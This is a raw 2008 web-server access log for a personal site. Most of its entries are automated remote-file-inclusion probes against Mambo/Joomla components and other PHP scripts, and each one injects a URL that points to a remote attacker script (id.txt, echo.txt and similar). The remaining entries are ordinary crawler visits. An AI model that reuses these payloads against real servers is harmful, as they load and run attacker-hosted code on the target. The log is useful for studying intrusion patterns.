70.85.38.226 - - [25/Jun/2008:11:52:04 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:52:07 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 200 18571 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:52:07 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:11:52:11 -0700] "GET /logs/access_080201.log//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.31 - - [25/Jun/2008:11:52:15 -0700] "GET /logs/access.log//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:11:52:32 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:11:52:33 -0700] "GET /lostpasswd.php?env[include_prefix]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.27.201 - - [25/Jun/2008:11:52:33 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:52:42 -0700] "GET /logs/access_071224.log/index.php?content=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:52:43 -0700] "GET /index.php?content=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18389 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:52:44 -0700] "GET /logs/index.php?content=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.193.226.112 - - [25/Jun/2008:11:52:44 -0700] "GET /logs/access_080102.log//Neos_Chronos/header.php?base_folder=http://dpfbrasilia.100webspace.net/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:11:52:57 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:11:52:57 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:52:58 -0700] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:52:58 -0700] "GET /logs/access_080307.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.38.226 - - [25/Jun/2008:11:53:08 -0700] "GET /logs/access_071229.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:11:53:24 -0700] "GET /logs/access_071225.log/index.php?pag=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [25/Jun/2008:11:53:40 -0700] "GET /logs/access_080213.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:11:53:50 -0700] "GET /logs/access_080218.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:11:54:21 -0700] "GET /logs/access_080121.log/index.php?body=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:54:22 -0700] "GET /logs/access_071225.log/index.php?pag=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:11:54:23 -0700] "GET /index.php?body=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:11:54:23 -0700] "GET /logs/index.php?body=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:11:54:42 -0700] "GET /logs/access_080213.log/index.php?body=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.230.236 - - [25/Jun/2008:11:54:46 -0700] "GET /blog/?show=gallery&pageid=17&nggpage=2 HTTP/1.1" 200 54419 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.230.236 - - [25/Jun/2008:11:54:47 -0700] "GET /blog/?show=slide&pageid=17 HTTP/1.1" 200 34758 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:54:49 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:54:53 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:54:58 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:54:59 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:55:01 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:55:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:55:04 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:11:55:07 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.167.194.105 - - [25/Jun/2008:11:55:07 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:55:24 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:11:55:24 -0700] "GET /logs/access_080213.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:11:55:24 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:11:55:26 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:11:55:29 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:11:55:35 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:55:40 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:55:46 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:55:51 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:11:55:56 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:56:11 -0700] "GET /logs/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
80.190.144.113 - - [25/Jun/2008:11:56:11 -0700] "GET /config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:56:20 -0700] "GET /logs/config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.166.27 - - [25/Jun/2008:11:56:20 -0700] "GET /config.php?path_to_root=http://www.shiasolution.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:56:21 -0700] "GET /logs/access.log//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:56:21 -0700] "GET //my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:56:22 -0700] "GET /logs//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:56:28 -0700] "GET /logs/access_080312.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:56:28 -0700] "GET /logs/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 53419 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:56:29 -0700] "GET /logs/access_080312.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:11:56:29 -0700] "GET /logs/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:56:36 -0700] "GET /logs/access.log//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:56:37 -0700] "GET //my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:11:56:37 -0700] "GET /logs//my_gallery/dload.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.249.233.191 - - [25/Jun/2008:11:56:47 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunsweet.info/learn/ganteng?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.249.233.191 - - [25/Jun/2008:11:56:47 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://sunsweet.info/learn/ganteng?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:11:56:56 -0700] "GET /phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:11:56:58 -0700] "GET /logs/access_080307.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.20.173 - - [25/Jun/2008:11:58:19 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hate.tao21.de//files/files/contrm.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.67.20.173 - - [25/Jun/2008:11:58:21 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://hate.tao21.de//files/files/contrm.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:11:59:00 -0700] "GET /logs/access.log/index.php?side=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:11:59:02 -0700] "GET /index.php?side=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.186.154 - - [25/Jun/2008:11:59:03 -0700] "GET /logs/index.php?side=http://4wdnews.com.au/files/tol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.108.35 - - [25/Jun/2008:11:59:29 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.108.35 - - [25/Jun/2008:11:59:41 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 9261848 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
89.111.176.84 - - [25/Jun/2008:11:59:44 -0700] "GET /logs/access_080215.log/administrator/components/com_mtree/config.mtree.php?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:11:59:46 -0700] "GET /logs/access_080213.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:12:00:04 -0700] "GET /includes/session.php?baseDir=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
193.239.211.19 - - [25/Jun/2008:12:00:04 -0700] "GET /logs/includes/session.php?baseDir=http://www.richandrowdyretirement.com/rss.php/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:12:00:07 -0700] "GET /logs/access_080117.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:12:00:07 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:12:00:07 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.37.125 - - [25/Jun/2008:12:00:23 -0700] "GET /?show=gallery&pageid=159 HTTP/1.0" 200 54281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [25/Jun/2008:12:00:23 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [25/Jun/2008:12:00:23 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.125 - - [25/Jun/2008:12:00:24 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://dmulk.com/?show=gallery&pageid=159" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
168.243.203.247 - - [25/Jun/2008:12:02:26 -0700] "GET /logs/access_071224.log/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.203.122.236 - - [25/Jun/2008:12:03:03 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.122.236 - - [25/Jun/2008:12:03:04 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://xdedzx.com/xdedzx/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:03:06 -0700] "GET /logs/access_080212.log/avatar.php?page=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:03:06 -0700] "GET /avatar.php?page=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:03:06 -0700] "GET /logs/avatar.php?page=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.20.73.217 - - [25/Jun/2008:12:03:31 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/jum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:03:37 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:03:45 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:03:45 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:03:45 -0700] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:03:49 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:03:51 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:03:57 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:04:17 -0700] "GET /logs/access_080127.log/index.php?sub=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:04:17 -0700] "GET /logs/access_080127.log/index.php?sub=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:04:19 -0700] "GET /logs/scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:04:20 -0700] "GET /scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.65.34.76 - - [25/Jun/2008:12:04:20 -0700] "GET /solpot.html?body=http://dj.caucasus.net/iddosi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:04:23 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_user_extended&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:04:24 -0700] "GET /logs/scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:04:25 -0700] "GET /scanhttp://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:04:25 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:04:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:04:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:12:04:27 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:12:04:27 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.241.90 - - [25/Jun/2008:12:04:27 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://waynesvillelive.com/livepics/albums/ghost%20town/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:04:28 -0700] "GET /index.php?sub=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.26 - - [25/Jun/2008:12:04:31 -0700] "GET /bikes/dteel/EQ2/Screenshots/?M=A HTTP/1.1" 200 7116 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
209.250.234.226 - - [25/Jun/2008:12:04:32 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.wkhm.com/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:04:38 -0700] "GET /index.php?sub=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 200 18365 "-" "libwww-perl/5.805" "www.dmulk.com"
